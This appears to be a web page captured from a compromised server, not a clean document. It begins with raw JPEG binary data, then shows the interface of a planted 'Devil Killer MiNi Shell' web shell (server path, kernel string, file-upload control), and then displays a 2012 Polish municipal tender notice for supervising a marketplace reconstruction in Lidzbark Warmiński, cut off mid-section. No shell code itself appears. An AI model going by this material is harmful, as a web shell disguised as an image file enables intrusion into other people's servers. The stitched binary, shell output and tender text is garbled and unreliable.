JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/187555-N-2012.html

<p class="kh_header"><b>Lidzbark Warmiński: Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu pn.: 

Przebudowa targowiska stałego przy ul. Ogrodowej   w Lidzbarku Warmińskim</b><br>
<b>Numer ogłoszenia: 187555 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu pn.: 

Przebudowa targowiska stałego przy ul. Ogrodowej   w Lidzbarku Warmińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu pn.: Przebudowa targowiska stałego przy ul. Ogrodowej                                                    w Lidzbarku Warmińskim.
2.	Podstawowe obowiązki Wykonawcy: 
       	Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu, zgodnie                 
        	z postanowieniami decyzji pozwolenia na budowę, przepisami prawa budowlanego                      
        	i innymi obowiązującymi w tym zakresie przepisami, a w szczególności:
1) Reprezentowanie inwestora na budowie poprzez sprawdzenia zgodności  
realizowanego projektu z umową, dokumentacją projektową, specyfikacjami 
technicznymi wykonania i odbioru robót budowlanych i pozwoleniem na     
budowę, zasadami wiedzy technicznej oraz przepisami techniczno-budowlanymi                 i Polskimi Normami;
2) Przeciwdziałanie nieprawidłowościom na placu budowy w związku z realizacją 
    	    projektu oraz podejmowanie niezbędnych w tym zakresie czynności;
          3) Sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych,                       
  	    a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych                   
           i niedopuszczonych do obrotu i stosowania w budownictwie;
4) Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 
    	    uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń   
technicznych oraz przygotowanie i udział w czynnościach odbioru końcowego   
projektu i przekazanie go do użytkowania;
5) Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także 
    kontrolowanie rozliczeń budowy poprzez potwierdzenie wykonanego przez realizatora 
    robót budowlano-montażowych zakresu rzeczowego i finansowego projektu,                          
    w szczególności w zakresie zgodności przyjętych założeń w harmonogramie 
    rzeczowo-finansowym, w protokołach odbioru robót, stanowiących podstawę do 
    wystawiania faktur przez realizatora robót;
          6) Kontrola postępu prac i robót;
          7) Sprawdzanie kosztorysów inwestorskich, ofertowych, robót dodatkowych                          
              i zamiennych pod względem kompletności zawartości i prawidłowości ich wykonania;
          8) Udział i przewodnictwo w naradach roboczych (sporządzanie protokołów z narad) na 
              etapie realizacji projektu mających na celu m.in. rozstrzyganie technicznych spraw  
              budowy, omawianie przebiegu realizacji budowy, itp.;
          9) Opracowanie oraz przekazywanie Zamawiającemu niezbędnych dokumentów do   
           uruchomienia finansowania projektu;
         10) Stwierdzanie gotowości  wykonanych robót do odbioru;
         11) Dokonywanie obiorów częściowych robót oraz odbioru końcowego;
         12) Przekazywanie Zamawiającemu protokołów odbioru oraz dokumentacji   
            powykonawczej;
      13) Obecność podczas kontroli zewnętrznych w trakcie realizacji projektu i po jego    
            zakończeniu;
      14) Dokonywanie czynności sprawdzenia kalkulacji szczegółowych lub kosztorysów 
            przedkładanych przez Wykonawcę lub Wykonawców robót, pod względem    
            zgodności wyceny z warunkami umownymi;
      15) Uzyskanie na rzecz Zamawiającego decyzji o dopuszczeniu zrealizowanego 
             projektu do użytkowania;
          16) Udział w pracach komisji powołanych do przeglądów gwarancyjnych dla   
                zrealizowanego projektu i o ile zajdzie taka potrzeba udział w pracach komisji   
                powołanych do ustalenia stwierdzonych wad i usterek w realizowanym                                   
                i przekazanym do użytkowania obiekcie oraz kontrola ich usunięcia w okresie  
                trwania gwarancji;
          17) Uczestniczenie w przeglądach w okresie gwarancji i rękojmi oraz kontrolowanie 
                usuwania ujawnionych wad i usterek;
          18) Dokonywanie regularnych wpisów do dziennika budowy;
          19) Składanie kwartalnych raportów o stanie zaawansowania inwestycji oraz 
                występujących trudności w realizacji prac i odstępstwach od umowy zawartej przez    
                Zamawiającego z Wykonawcą robót budowlanych;
          20) Wykonywanie innych czynności nie wymienionych wyżej, które są niezbędne do 
               prawidłowej realizacji projektu.
3.  W zakres robót objętych projektem wchodzi:
- wykonanie robót budowlanych w zakresie obejmującym roboty ziemne                              i fundamentowe pod zadaszenie targowiska, wykonanie konstrukcji stalowej                           i pokrycia dachu oraz dostawę i montaż stołów targowych;
- wykonanie robót drogowych w zakresie obejmującym wykonanie niezbędnych robót pomiarowych, rozbiórkowych i ziemnych oraz nawierzchni z kostki betonowej gr. 8 cm na podsypce cementowo-piaskowej i podbudowie z kruszywa naturalnego i nawierzchni żwirowej oraz wykonanie chodników z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej;
- wykonanie robót sanitarnych w zakresie przygotowania terenu pod budowę                             i roboty ziemne kanalizacji deszczowej, wodociągowej i sanitarnej oraz budowę kanalizacji deszczowej, wodociągowej i sanitarnej;
- wykonanie przebudowy i zabezpieczenia kabli en. nn. pod nawierzchnią drogi                    i parkingu;
- wykonanie oświetlenia zewnętrznego w zakresie obejmującym budowę oświetlenia na słupach stalowych z zasilaniem kablowym, montaż instalacji wyrównawczej                       i ochronnej, zabezpieczenie linii kablowej sn pod nawierzchnią drogi, demontaż oświetlenia zewnętrznego oraz prace pomiarowe, 
oraz wykonanie pozostałych robót, zgodnie z dokumentacją projektową  i specyfikacjami  technicznymi wykonania i odbioru robót budowlanych, które są dostępne na stronie internetowej zamawiającego pod adresem: http://lidzbarkw-um.bip-wm.pl/zamówienia publiczne - ogłoszenia i SIWZ/Przetarg nieograniczony na wykonanie projektu pn.:                         Przebudowa targowiska stałego przy ul. Ogrodowej w Lidzbarku Warmińskim.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na specyfikę przedmiotu zamówienia oraz braku obowiązku posiadania szczególnych uprawnień przez wykonawców ubiegających się o przedmiotowe	zamówienie nałożonych przez przepisy prawa, Zamawiający nie opisuje sposobu 
          dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
     	wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
     	prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej dwie usługi
     	kompleksowego nadzoru inwestorskiego nad realizacją co najmniej dwóch robót   
     	budowlanych polegających na budowie lub przebudowie obiektu budowlanego wraz                             
     	z instalacjami i urządzeniami, o  wartości roboty nie mniejszej niż 700 000,00 zł 
          brutto (słownie: siedemset tysięcy złotych brutto). 
     	Wykonawca zobowiązany jest również do złożenia dokumentów potwierdzających, że 
          usługi te zostały wykonane należycie.  	
     	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
     	wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
wykaże, że dysponuje następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:

a)	Osoba 1 - Kierownik Zespołu - Inspektor nadzoru inwestorskiego,
      posiadający:
- uprawnienia budowlane  do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane na podstawie aktualnych przepisów Prawo budowalne, lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 5 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
b)	Osoba 2 - Inspektor nadzoru inwestorskiego - branża sanitarna, posiadający:
 - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
c)	Osoba 3 - Inspektor nadzoru inwestorskiego - branża elektryczna, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
d)	Osoba 4 - Inspektor nadzoru inwestorskiego -  branża drogowa, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,	

	   Osoby, o których mowa wyżej  i które uzyskały kwalifikacje do wykonywania
 	samodzielnych funkcji technicznych w Rzeczypospolitej Polskiej, muszą być 
  	wpisane na listę członków  właściwej izby samorządu zawodowego i ubezpieczone od odpowiedzialności cywilnej, co daje prawo wykonywania samodzielnych funkcji
  	technicznych w budownictwie, zgodnie z ustawą z dnia 15.12.2000r.                               o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001r., Nr 5, poz. 42 z późn. zm.). Oprócz osób, o których mowa wyżej                 w wykonaniu zamówienia mogą wziąć udział również osoby, będące obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, spełniający  wymagania zawarte  w ustawie  z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), a w szczególności w art. 12a oraz                w ustawie z dnia 18 marca 2008 r. o  zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
 Wymienione wyżej osoby nie wyczerpują wymagań dla rzetelnego     
 wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne     
 wymagania Zamawiającego. Wykonawca powinien zapewnić swoim specjalistom  
 niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, którzy mogą 
 być niezbędni do właściwego wykonania umowy
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony według wzoru stanowiącego  załącznik nr 1 do SIWZ,
2. Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty 
      nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku 	Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument 	ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 	zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, a w szczególności:
1)	okoliczności uniemożliwiające realizację przedmiotu umowy w terminie, w tym:
a)	zmiana zakresu nadzorowanych robót budowlanych, wystąpienie robót zamiennych lub dodatkowych od wykonania których uzależnione jest wykonanie zamówienia podstawowego, 	może spowodować zmianę terminu realizacji Umowy, 
b)	wystąpienie przestojów robót budowlanych spowodowanych koniecznością usunięcia uszkodzeń istniejących sieci i urządzeń podziemnych, wystąpienie nieprzewidzianych warunków geologicznych, archeologicznych lub terenowych, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne lub wstrzymanie wykonania robót przez uprawnione organy, może spowodować zmianę terminu realizacji Umowy,
c)	wystąpienie Siły Wyższej uniemożliwiającej realizację inwestycji może spowodować zmianę terminu realizacji Umowy.
d)	zmiany przepisów prawa mających wpływ na treść niniejszej umowy; 
e)	działań organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji umowy, 
f)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającej   
       bezpośredni wpływ na terminowość realizacji umowy.
2)	W przypadku wystąpienia opóźnień, będących wynikiem zdarzeń opisanych w ust. 1,    
            strony  ustalą nowe terminy realizacji z zastrzeżeniem, iż maksymalny okres   
            przesunięcia terminu zakończenia realizacji umowy będzie równy okresowi przerwy.
3)	wystąpienie okoliczności powodujących konieczność rezygnacji przez Zamawiającego 	               
      z części zakresu robót realizowanych przez wykonawcę robót budowlanych                           	 w ramach projektu, nie zachodzi konieczność ich wykonania, ograniczenia lub 	 
      przerwania dofinansowania realizacji inwestycji ze środków Unii 	Europejskiej w ramach  
      Programu Rozwoju Obszarów Wiejskich na lata 2007-2013. W takich przypadkach   
      wynagrodzenie za świadczenie usług nadzoru inwestorskiego, zostanie pomniejszone przez zastosowanie procentu, o jaki zmniejszyła się wartość 
      robót budowlanych.
2. Zmiana umowy może również nastąpić:
1) W przypadku nie wykonania części  lub całości zamówienia z powodu tego, że wykonanie 
    zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili 
    zawarcia umowy wysokość wynagrodzenia Wykonawcy zostanie zmniejszona o wartość 
    usług niewykonanych,
2) W przypadku zmiany osób reprezentujących strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. Nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2012 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. Nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013,
Oś Priorytetowa 3 - Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej,
